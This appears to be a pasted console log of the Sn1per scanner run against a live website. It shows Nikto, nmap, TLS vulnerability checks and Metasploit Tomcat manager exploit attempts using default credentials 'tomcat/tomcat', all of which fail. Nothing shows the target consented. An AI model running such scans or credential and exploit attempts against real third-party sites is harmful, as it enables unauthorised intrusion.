  2519. ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 
  2520. ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 
  2521. ░ ░ 
  2522. + -- --=[MÄŚŚBĻËËĐ V20160303 BÅž 1Ņ3 @ ĊŖÖŎĐŚȞÏËĻĐ - https://crowdshield.com
  2523. + -- --=[Scan Complete!
  2524.  + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
  2525. + -- --=[Checking if X-Content options are enabled on illuminatiofficial.org... 
  2526. x-content-type-options: nosniff
  2527.  
  2528. + -- --=[Checking if X-Frame options are enabled on illuminatiofficial.org... 
  2529.  
  2530. + -- --=[Checking if X-XSS-Protection header is enabled on illuminatiofficial.org... 
  2531.  
  2532. + -- --=[Checking HTTP methods on illuminatiofficial.org... 
  2533.  
  2534. + -- --=[Checking if TRACE method is enabled on illuminatiofficial.org... 
  2535.  
  2536. + -- --=[Checking for META tags on illuminatiofficial.org... 
  2537.  
  2538. + -- --=[Checking for open proxy on illuminatiofficial.org... 
  2539.  
  2540. + -- --=[Enumerating software on illuminatiofficial.org... 
  2541. x-powered-by: HHVM/3.23.2
  2542. set-cookie: PHPSESSID=16f6122253575c90cf813caf978ced32; path=/
  2543. server: cloudflare-nginx
  2544.  
  2545. + -- --=[Checking if Strict-Transport-Security is enabled on illuminatiofficial.org... 
  2546.  
  2547. + -- --=[Checking for Flash cross-domain policy on illuminatiofficial.org... 
  2548.  
  2549. + -- --=[Checking for Silverlight cross-domain policy on illuminatiofficial.org... 
  2550.  
  2551. + -- --=[Checking for HTML5 cross-origin resource sharing on illuminatiofficial.org... 
  2552.  
  2553. + -- --=[Retrieving robots.txt on illuminatiofficial.org... 
  2554. User-agent: *
  2555. Disallow: /wp-admin/
  2556. Allow: /wp-admin/admin-ajax.php
  2557.  
  2558. + -- --=[Retrieving sitemap.xml on illuminatiofficial.org... 
  2559.  
  2560. + -- --=[Checking cookie attributes on illuminatiofficial.org... 
  2561. set-cookie: __cfduid=d9c8bfbeaac07e56caa5172762680db881515133657; expires=Sat, 05-Jan-19 06:27:37 GMT; path=/; domain=.illuminatiofficial.org; HttpOnly
  2562. set-cookie: PHPSESSID=16f6122253575c90cf813caf978ced32; path=/
  2563.  
  2564. + -- --=[Checking for ASP.NET Detailed Errors on illuminatiofficial.org... 
  2565. <body class="error404 loading _masterslider _msp_version_3.0.4 wpb-js-composer js-comp-ver-5.0.1 vc_responsive" itemscope="itemscope" itemtype="https://schema.org/WebPage" data-adminbar="">
  2566.  
  2567. 
  2568.  + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
  2569. - Nikto v2.1.6
  2570. ---------------------------------------------------------------------------
  2571. + Target IP: 104.24.30.26
  2572. + Target Hostname: illuminatiofficial.org
  2573. + Target Port: 443
  2574. ---------------------------------------------------------------------------
  2575. + SSL Info: Subject: /OU=Domain Control Validated/OU=PositiveSSL Multi-Domain/CN=ssl387740.cloudflaressl.com
  2576. Ciphers: ECDHE-ECDSA-CHACHA20-POLY1305
  2577. Issuer: /C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO ECC Domain Validation Secure Server CA 2
  2578. + Start Time: 2018-01-05 01:27:39 (GMT-5)
  2579. ---------------------------------------------------------------------------
  2580. + Server: cloudflare-nginx
  2581. + Cookie __cfduid created without the secure flag
  2582. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  2583. + Uncommon header 'cf-ray' found, with contents: 3d845f7adaf94722-EWR
  2584. + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
  2585. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  2586. + All CGI directories 'found', use '-C none' to test none
  2587. + The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
  2588. + Hostname 'illuminatiofficial.org' does not match certificate's names: ssl387740.cloudflaressl.com
  2589. + Scan terminated: 16 error(s) and 7 item(s) reported on remote host
  2590. + End Time: 2018-01-05 01:54:26 (GMT-5) (1607 seconds)
  2591. ---------------------------------------------------------------------------
  2592. + 1 host(s) tested
  2593.  + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
  2594. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/illuminatiofficial.org-port443.jpg
  2595.  + -- --=[Port 445 closed... skipping.
  2596.  + -- --=[Port 512 closed... skipping.
  2597.  + -- --=[Port 513 closed... skipping.
  2598.  + -- --=[Port 514 closed... skipping.
  2599.  + -- --=[Port 623 closed... skipping.
  2600.  + -- --=[Port 624 closed... skipping.
  2601.  + -- --=[Port 1099 closed... skipping.
  2602.  + -- --=[Port 1433 closed... skipping.
  2603.  + -- --=[Port 2049 closed... skipping.
  2604.  + -- --=[Port 2121 closed... skipping.
  2605.  + -- --=[Port 3306 closed... skipping.
  2606.  + -- --=[Port 3310 closed... skipping.
  2607.  + -- --=[Port 3128 closed... skipping.
  2608.  + -- --=[Port 3389 closed... skipping.
  2609.  + -- --=[Port 3632 closed... skipping.
  2610.  + -- --=[Port 4443 closed... skipping.
  2611.  + -- --=[Port 5432 closed... skipping.
  2612.  + -- --=[Port 5800 closed... skipping.
  2613.  + -- --=[Port 5900 closed... skipping.
  2614.  + -- --=[Port 5984 closed... skipping.
  2615.  + -- --=[Port 6000 closed... skipping.
  2616.  + -- --=[Port 6667 closed... skipping.
  2617.  + -- --=[Port 8000 closed... skipping.
  2618.  + -- --=[Port 8100 closed... skipping.
  2619.  + -- --=[Port 8080 opened... running tests...
  2620.  
  2621. ^ ^
  2622. _ __ _ ____ _ __ _ _ ____
  2623. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  2624. | V V // o // _/ | V V // 0 // 0 // _/
  2625. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  2626. <
  2627. ...'
  2628.  
  2629. WAFW00F - Web Application Firewall Detection Tool
  2630.  
  2631. By Sandro Gauci && Wendel G. Henrique
  2632.  
  2633. Checking http://illuminatiofficial.org:8080
  2634. The site http://illuminatiofficial.org:8080 is behind a CloudFlare
  2635. Number of requests: 1
  2636.  
  2637. http://illuminatiofficial.org:8080 [521 Unassigned] CloudFlare, Cookies[__cfduid,cf_ob_info,cf_use_ob], Country[UNITED STATES][US], HTML5, HTTPServer[cloudflare-nginx], HttpOnly[__cfduid], IP[104.24.30.26], JQuery, Script[text/javascript], Title[illuminatiofficial.org | 521: Web server is down], UncommonHeaders[cf-ray], X-Frame-Options[SAMEORIGIN], X-UA-Compatible[IE=Edge]
  2638.  
  2639.  
  2640.  __ ______ _____ 
  2641.  \ \/ / ___|_ _|
  2642.  \ /\___ \ | | 
  2643.  / \ ___) || | 
  2644.  /_/\_|____/ |_| 
  2645.  
  2646. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  2647. + -- --=[Target: illuminatiofficial.org:8080
  2648. + -- --=[Site not vulnerable to Cross-Site Tracing!
  2649. + -- --=[Site not vulnerable to Host Header Injection!
  2650. + -- --=[Site not vulnerable to Cross-Frame Scripting!
  2651. + -- --=[Site not vulnerable to Clickjacking!
  2652.  
  2653. HTTP/1.1 405 Not Allowed
  2654. Date: Fri, 05 Jan 2018 06:55:16 GMT
  2655. Content-Type: text/html
  2656. Content-Length: 177
  2657. Connection: close
  2658. Server: cloudflare-nginx
  2659. CF-RAY: -
  2660.  
  2661. <html>
  2662. <head><title>405 Not Allowed</title></head>
  2663. <body bgcolor="white">
  2664. <center><h1>405 Not Allowed</h1></center>
  2665. <hr><center>cloudflare-nginx</center>
  2666. </body>
  2667. </html>
  2668. 
  2669. HTTP/1.1 521 Origin Down
  2670. Date: Fri, 05 Jan 2018 06:55:16 GMT
  2671. Content-Type: text/html; charset=UTF-8
  2672. Transfer-Encoding: chunked
  2673. Connection: keep-alive
  2674. Set-Cookie: __cfduid=da3b612c5382b1b54e71f5efb2ff4e7c51515135316; expires=Sat, 05-Jan-19 06:55:16 GMT; path=/; domain=.illuminatiofficial.org; HttpOnly
  2675. Expires: Thu, 01 Jan 1970 00:00:01 GMT
  2676. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  2677. Pragma: no-cache
  2678. X-Frame-Options: SAMEORIGIN
  2679. Set-Cookie: cf_use_ob=8080; expires=Fri, 05-Jan-18 06:55:46 GMT; path=/
  2680. Set-Cookie: cf_ob_info=521:3d8487f1a2ee99e6:EWR; expires=Fri, 05-Jan-18 06:55:46 GMT; path=/
  2681. Server: cloudflare-nginx
  2682. CF-RAY: 3d8487f1a2ee99e6-EWR
  2683.  
  2684. 1328
  2685. <!DOCTYPE html>
  2686. <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
  2687. <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
  2688. <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
  2689. <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
  2690. <hea
  2691.  
  2692.  
  2693. Version: 1.11.10-static
  2694. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  2695. 
  2696. Testing SSL server illuminatiofficial.org on port 8080 using SNI name illuminatiofficial.org
  2697.  
  2698. TLS Fallback SCSV:
  2699. Server does not support TLS Fallback SCSV
  2700.  
  2701. TLS renegotiation:
  2702. Session renegotiation not supported
  2703.  
  2704. TLS Compression:
  2705. Compression disabled
  2706.  
  2707. Heartbleed:
  2708. TLS 1.2 not vulnerable to heartbleed
  2709. TLS 1.1 not vulnerable to heartbleed
  2710. TLS 1.0 not vulnerable to heartbleed
  2711.  
  2712. Supported Server Cipher(s):
  2713. ███▄ ▄███▓ ▄▄▄ ██████ ██████ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄ 
  2714. ▓██▒▀█▀ ██▒▒████▄ ▒██ ▒ ▒██ ▒ ▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
  2715. ▓██ ▓██░▒██ ▀█▄ ░ ▓██▄ ░ ▓██▄ ▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
  2716. ▒██ ▒██ ░██▄▄▄▄██ ▒ ██▒ ▒ ██▒▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
  2717. ▒██▒ ░██▒ ▓█ ▓██▒▒██████▒▒▒██████▒▒░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓ 
  2718. ░ ▒░ ░ ░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒ 
  2719. ░ ░ ░ ▒ ▒▒ ░░ ░▒ ░ ░░ ░▒ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒ 
  2720. ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 
  2721. ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 
  2722. ░ ░ 
  2723. + -- --=[MÄŚŚBĻËËĐ V20160303 BÅž 1Ņ3 @ ĊŖÖŎĐŚȞÏËĻĐ - https://crowdshield.com
  2724. + -- --=[Checking for DROWN (SSLv2): 104.24.31.26:8080
  2725. + -- --=[Checking for HeartBleed: 104.24.31.26:8080
  2726. + -- --=[Checking for OpenSSL CCS: 104.24.31.26:8080
  2727. + -- --=[Checking for Poodle (SSLv3): 104.24.31.26:8080
  2728. + -- --=[Checking for WinShock (MS14-066): 104.24.31.26:8080
  2729. Testing if OpenSSL supports the ciphers we are checking for: YES
  2730.  
  2731. Testing 104.24.31.26:8080 for availability of SSL ciphers added in MS14-066...
  2732. Testing cipher DHE-RSA-AES256-GCM-SHA384: UNSUPPORTED
  2733. Testing cipher DHE-RSA-AES128-GCM-SHA256: UNSUPPORTED
  2734. Testing cipher AES256-GCM-SHA384: UNSUPPORTED
  2735. Testing cipher AES128-GCM-SHA256: UNSUPPORTED
  2736. Checking if target system is running Windows Server 2012 or later...
  2737. Testing cipher ECDHE-RSA-AES256-SHA384: UNSUPPORTED
  2738. Testing cipher ECDHE-RSA-AES256-SHA: UNSUPPORTED
  2739. 104.24.31.26:8080 is patched: NO
  2740. + -- --=[Scan Complete!
  2741. - Nikto v2.1.6
  2742. ---------------------------------------------------------------------------
  2743. + Target IP: 104.24.31.26
  2744. + Target Hostname: illuminatiofficial.org
  2745. + Target Port: 8080
  2746. + Start Time: 2018-01-05 01:55:27 (GMT-5)
  2747. ---------------------------------------------------------------------------
  2748. + Server: cloudflare-nginx
  2749. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  2750. + Uncommon header 'cf-ray' found, with contents: 3d848836b7f72192-EWR
  2751. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  2752. + All CGI directories 'found', use '-C none' to test none
  2753. + 26099 requests: 0 error(s) and 3 item(s) reported on remote host
  2754. + End Time: 2018-01-05 02:23:19 (GMT-5) (1672 seconds)
  2755. ---------------------------------------------------------------------------
  2756. + 1 host(s) tested
  2757.  
  2758. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-05 02:23 EST
  2759. Nmap scan report for illuminatiofficial.org (104.24.30.26)
  2760. Host is up (0.11s latency).
  2761. Other addresses for illuminatiofficial.org (not scanned): 2400:cb00:2048:1::6818:1f1a 2400:cb00:2048:1::6818:1e1a 104.24.31.26
  2762.  
  2763. PORT STATE SERVICE VERSION
  2764. 8080/tcp open http Cloudflare nginx
  2765. |_http-server-header: cloudflare-nginx
  2766. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  2767. Device type: general purpose
  2768. Running (JUST GUESSING): Linux 3.X|2.6.X (88%)
  2769. OS CPE: cpe:/o:linux:linux_kernel:3.18 cpe:/o:linux:linux_kernel:2.6
  2770. Aggressive OS guesses: Linux 3.18 (88%), Linux 2.6.18 - 2.6.22 (86%)
  2771. No exact OS matches for host (test conditions non-ideal).
  2772. Network Distance: 10 hops
  2773.  
  2774. TRACEROUTE (using port 8080/tcp)
  2775. HOP RTT ADDRESS
  2776. 1 109.91 ms 10.13.0.1
  2777. 2 110.41 ms 37.187.24.253
  2778. 3 109.97 ms 10.50.225.60
  2779. 4 110.38 ms 10.17.129.46
  2780. 5 109.89 ms 10.73.0.48
  2781. 6 111.80 ms 10.95.33.8
  2782. 7 114.08 ms be100-1106.gsw-1-a9.fr.eu (91.121.215.177)
  2783. 8 114.32 ms cloudflare.par.franceix.net (37.49.237.49)
  2784. 9 114.37 ms cloudflare.par.franceix.net (37.49.237.49)
  2785. 10 113.72 ms 104.24.30.26
  2786.  
  2787. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2788. Nmap done: 1 IP address (1 host up) scanned in 22.97 seconds
  2789. 
  2790.  .~+P``````-o+:. -o+:.
  2791. .+oooyysyyssyyssyddh++os-````` ``````````````` `
  2792. +++++++++++++++++++++++sydhyoyso/:.````...`...-///::+ohhyosyyosyy/+om++:ooo///o
  2793. ++++///////~~~~///////++++++++++++++++ooyysoyysosso+++++++++++++++++++///oossosy
  2794. --.` .-.-...-////+++++++++++++++////////~~//////++++++++++++///
  2795.  `...............` `...-/////...`
  2796. 
  2797. 
  2798.  .::::::::::-. .::::::-
  2799.  .hmMMMMMMMMMMNddds\...//M\\.../hddddmMMMMMMNo
  2800.  :Nm-/NMMMMMMMMMMMMM$$NMMMMm&&MMMMMMMMMMMMMMy
  2801.  .sm/`-yMMMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMMh`
  2802.  -Nd` :MMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMh`
  2803.  -Nh` .yMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMm/
  2804.  `oo/``-hd: `` .sNd :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMm/
  2805.  .yNmMMh//+syysso-`````` -mh` :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMd
  2806.  .shMMMMN//dmNMMMMMMMMMMMMs` `:```-o++++oooo+:/ooooo+:+o+++oooo++/
  2807.  `///omh//dMMMMMMMMMMMMMMMN/:::::/+ooso--/ydh//+s+/ossssso:--syN///os:
  2808.  /MMMMMMMMMMMMMMMMMMd. `/++-.-yy/...osydh/-+oo:-`o//...oyodh+
  2809.  -hMMmssddd+:dMMmNMMh. `.-=mmk.//^^^\\.^^`:++:^^o://^^^\\`::
  2810.  .sMMmo. -dMd--:mN/` ||--X--|| ||--X--||
  2811. ........../yddy/:...+hmo-...hdd:............\\=v=//............\\=v=//.........
  2812. ================================================================================
  2813. =====================+--------------------------------+=========================
  2814. =====================| Session one died of dysentery. |=========================
  2815. =====================+--------------------------------+=========================
  2816. ================================================================================
  2817. 
  2818.  Press ENTER to size up the situation
  2819. 
  2820. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  2821. %%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: April 25, 1848 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  2822. %%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It's always cool in the lab %%%%%%%%%%%%%%%%
  2823. %%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  2824. %%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  2825. %%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  2826. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  2827. 
  2828.  Press SPACE BAR to continue
  2829. 
  2830. 
  2831.  
  2832. =[ metasploit v4.16.28-dev ]
  2833. + -- --=[ 1716 exploits - 985 auxiliary - 300 post ]
  2834. + -- --=[ 507 payloads - 40 encoders - 10 nops ]
  2835. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  2836.  
  2837. RHOST => illuminatiofficial.org
  2838. [-] WAR file not found
  2839. [*] Auxiliary module execution completed
  2840. RHOSTS => illuminatiofficial.org
  2841. [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
  2842. RHOST => illuminatiofficial.org
  2843. RPORT => 8080
  2844. [*] Scanned 1 of 4 hosts (25% complete)
  2845. [*] Scanned 2 of 4 hosts (50% complete)
  2846. [*] Scanned 3 of 4 hosts (75% complete)
  2847. [*] Scanned 4 of 4 hosts (100% complete)
  2848. [*] Auxiliary module execution completed
  2849. [*] Attempting to connect to 2400:cb00:2048:1::6818:1e1a:8080
  2850. [+] No File(s) found
  2851. [*] Scanned 1 of 4 hosts (25% complete)
  2852. [*] Attempting to connect to 2400:cb00:2048:1::6818:1f1a:8080
  2853. [+] No File(s) found
  2854. [*] Scanned 2 of 4 hosts (50% complete)
  2855. [*] Attempting to connect to 104.24.31.26:8080
  2856. [+] No File(s) found
  2857. [*] Scanned 3 of 4 hosts (75% complete)
  2858. [*] Attempting to connect to 104.24.30.26:8080
  2859. [+] No File(s) found
  2860. [*] Scanned 4 of 4 hosts (100% complete)
  2861. [*] Auxiliary module execution completed
  2862. [*] http://[2400:cb00:2048:1::6818:1f1a]:8080/admin/j_security_check - Checking j_security_check...
  2863. [*] http://[2400:cb00:2048:1::6818:1f1a]:8080/admin/j_security_check - Server returned: 403
  2864. [-] http://[2400:cb00:2048:1::6818:1f1a]:8080/admin/j_security_check - Unable to enumerate users with this URI
  2865. [*] Scanned 1 of 4 hosts (25% complete)
  2866. [*] http://[2400:cb00:2048:1::6818:1e1a]:8080/admin/j_security_check - Checking j_security_check...
  2867. [*] http://[2400:cb00:2048:1::6818:1e1a]:8080/admin/j_security_check - Server returned: 403
  2868. [-] http://[2400:cb00:2048:1::6818:1e1a]:8080/admin/j_security_check - Unable to enumerate users with this URI
  2869. [*] Scanned 2 of 4 hosts (50% complete)
  2870. [*] http://104.24.30.26:8080/admin/j_security_check - Checking j_security_check...
  2871. [*] http://104.24.30.26:8080/admin/j_security_check - Server returned: 403
  2872. [-] http://104.24.30.26:8080/admin/j_security_check - Unable to enumerate users with this URI
  2873. [*] Scanned 3 of 4 hosts (75% complete)
  2874. [*] http://104.24.31.26:8080/admin/j_security_check - Checking j_security_check...
  2875. [*] http://104.24.31.26:8080/admin/j_security_check - Server returned: 403
  2876. [-] http://104.24.31.26:8080/admin/j_security_check - Unable to enumerate users with this URI
  2877. [*] Scanned 4 of 4 hosts (100% complete)
  2878. [*] Auxiliary module execution completed
  2879. [-] http://2400:cb00:2048:1::6818:1f1a:8080 - Authorization not requested
  2880. [*] Scanned 1 of 4 hosts (25% complete)
  2881. [-] http://2400:cb00:2048:1::6818:1e1a:8080 - Authorization not requested
  2882. [*] Scanned 2 of 4 hosts (50% complete)
  2883. [-] http://104.24.30.26:8080 - Authorization not requested
  2884. [*] Scanned 3 of 4 hosts (75% complete)
  2885. [-] http://104.24.31.26:8080 - Authorization not requested
  2886. [*] Scanned 4 of 4 hosts (100% complete)
  2887. [*] Auxiliary module execution completed
  2888. [-] Exploit aborted due to failure: not-found: The target server fingerprint "cloudflare-nginx ( 403-Forbidden )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
  2889. [*] Exploit completed, but no session was created.
  2890. USERNAME => tomcat
  2891. PASSWORD => tomcat
  2892. [-] Exploit aborted due to failure: not-found: The target server fingerprint "cloudflare-nginx ( 403-Forbidden )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
  2893. [*] Exploit completed, but no session was created.
  2894.  + -- --=[Port 8180 closed... skipping.
  2895.  + -- --=[Port 8443 opened... running tests...
  2896.  
  2897. ^ ^
  2898. _ __ _ ____ _ __ _ _ ____
  2899. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  2900. | V V // o // _/ | V V // 0 // 0 // _/
  2901. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  2902. <
  2903. ...'
  2904.  
  2905. WAFW00F - Web Application Firewall Detection Tool
  2906.  
  2907. By Sandro Gauci && Wendel G. Henrique
  2908.  
  2909. Checking http://illuminatiofficial.org:8443
  2910. The site http://illuminatiofficial.org:8443 is behind a CloudFlare
  2911. Number of requests: 1
  2912.  
  2913. http://illuminatiofficial.org:8443 [400 Bad Request] CloudFlare, Country[UNITED STATES][US], HTTPServer[cloudflare-nginx], IP[104.24.31.26], Title[400 The plain HTTP request was sent to HTTPS port], UncommonHeaders[cf-ray]
  2914.  
  2915.  
  2916.  __ ______ _____ 
  2917.  \ \/ / ___|_ _|
  2918.  \ /\___ \ | | 
  2919.  / \ ___) || | 
  2920.  /_/\_|____/ |_| 
  2921.  
  2922. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  2923. + -- --=[Target: illuminatiofficial.org:8443
  2924. + -- --=[Site not vulnerable to Cross-Site Tracing!
  2925. + -- --=[Site not vulnerable to Host Header Injection!
  2926. + -- --=[Site vulnerable to Cross-Frame Scripting!
  2927. + -- --=[Site vulnerable to Clickjacking!
  2928.  
  2929. HTTP/1.1 405 Not Allowed
  2930. Server: cloudflare-nginx
  2931. Date: Fri, 05 Jan 2018 07:26:04 GMT
  2932. Content-Type: text/html
  2933. Content-Length: 177
  2934. Connection: close
  2935. CF-RAY: -
  2936.  
  2937. <html>
  2938. <head><title>405 Not Allowed</title></head>
  2939. <body bgcolor="white">
  2940. <center><h1>405 Not Allowed</h1></center>
  2941. <hr><center>cloudflare-nginx</center>
  2942. </body>
  2943. </html>
  2944. 
  2945. HTTP/1.1 400 Bad Request
  2946. Server: cloudflare-nginx
  2947. Date: Fri, 05 Jan 2018 07:26:04 GMT
  2948. Content-Type: text/html
  2949. Content-Length: 275
  2950. Connection: close
  2951. CF-RAY: -
  2952.  
  2953. <html>
  2954. <head><title>400 The plain HTTP request was sent to HTTPS port</title></head>
  2955. <body bgcolor="white">
  2956. <center><h1>400 Bad Request</h1></center>
  2957. <center>The plain HTTP request was sent to HTTPS port</center>
  2958. <hr><center>cloudflare-nginx</center>
  2959. </body>
  2960. </html>
  2961. 
  2962.  
  2963.  
  2964. Version: 1.11.10-static
  2965. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  2966. 
  2967. Testing SSL server illuminatiofficial.org on port 8443 using SNI name illuminatiofficial.org
  2968.  
  2969. TLS Fallback SCSV:
  2970. Server does not support TLS Fallback SCSV
  2971.  
  2972. TLS renegotiation:
  2973. Secure session renegotiation supported
  2974.  
  2975. TLS Compression:
  2976. Compression disabled
  2977.  
  2978. Heartbleed:
  2979. TLS 1.2 not vulnerable to heartbleed
  2980. TLS 1.1 not vulnerable to heartbleed
  2981. TLS 1.0 not vulnerable to heartbleed
  2982.  
  2983. Supported Server Cipher(s):
  2984. Preferred TLSv1.2 256 bits ECDHE-ECDSA-CHACHA20-POLY1305 Curve P-256 DHE 256
  2985. Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  2986. Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
  2987. Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-SHA256 Curve P-256 DHE 256
  2988. Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  2989. Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
  2990. Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-SHA384 Curve P-256 DHE 256
  2991. Accepted TLSv1.2 256 bits ECDHE-RSA-CHACHA20-POLY1305  Curve P-256 DHE 256
  2992. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256  Curve P-256 DHE 256
  2993. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  2994. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  2995. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
  2996. Accepted TLSv1.2 128 bits AES128-SHA
  2997. Accepted TLSv1.2 128 bits AES128-SHA256
  2998. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384  Curve P-256 DHE 256
  2999. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  3000. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  3001. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
  3002. Accepted TLSv1.2 256 bits AES256-SHA
  3003. Accepted TLSv1.2 256 bits AES256-SHA256
  3004. Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  3005. Accepted TLSv1.1 128 bits AES128-SHA
  3006. Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  3007. Accepted TLSv1.1 256 bits AES256-SHA
  3008. Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  3009. Accepted TLSv1.0 128 bits AES128-SHA
  3010. Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  3011. Accepted TLSv1.0 256 bits AES256-SHA
  3012. Accepted TLSv1.0 112 bits DES-CBC3-SHA 
  3013.  
  3014. SSL Certificate:
  3015. Signature Algorithm: ecdsa-with-SHA256
  3016. Subject: ssl387740.cloudflaressl.com
  3017. Altnames: DNS:ssl387740.cloudflaressl.com, DNS:*.cdn2u.com, DNS:*.dynamo-cycling.com, DNS:*.illuminati.am, DNS:*.illuminati.mp, DNS:*.illuminatiofficial.org, DNS:*.invitebyvoice.com, DNS:*.ipay.com.bd, DNS:*.offensivegreetingcards.com, DNS:*.pommadedivine.com, DNS:*.priyo.com, DNS:*.rateareporter.com, DNS:*.take2.co, DNS:*.tero.com, DNS:*.tinanz.com, DNS:*.vandenboss.com, DNS:cdn2u.com, DNS:dynamo-cycling.com, DNS:illuminati.am, DNS:illuminati.mp, DNS:illuminatiofficial.org, DNS:invitebyvoice.com, DNS:ipay.com.bd, DNS:offensivegreetingcards.com, DNS:pommadedivine.com, DNS:priyo.com, DNS:rateareporter.com, DNS:take2.co, DNS:tero.com, DNS:tinanz.com, DNS:vandenboss.com
  3018. Issuer: COMODO ECC Domain Validation Secure Server CA 2
  3019.  
  3020. Not valid before: Dec 29 00:00:00 2017 GMT
  3021. Not valid after: Jul 7 23:59:59 2018 GMT
  3022.  
  3023.  
  3024.  
  3025. AVAILABLE PLUGINS
  3026. -----------------
  3027.  
  3028. PluginHSTS
  3029. PluginHeartbleed
  3030. PluginSessionRenegotiation
  3031. PluginChromeSha1Deprecation
  3032. PluginCompression
  3033. PluginSessionResumption
  3034. PluginCertInfo
  3035. PluginOpenSSLCipherSuites
  3036.  
  3037.  
  3038.  
  3039. CHECKING HOST(S) AVAILABILITY
  3040. -----------------------------
  3041.  
  3042. illuminatiofficial.org:8443 => 2400:cb00:2048:1::6818:1f1a:8443
  3043.  
  3044.  
  3045.  
  3046. SCAN RESULTS FOR ILLUMINATIOFFICIAL.ORG:8443 - 2400:CB00:2048:1::6818:1F1A:8443
  3047. -------------------------------------------------------------------------------
  3048.  
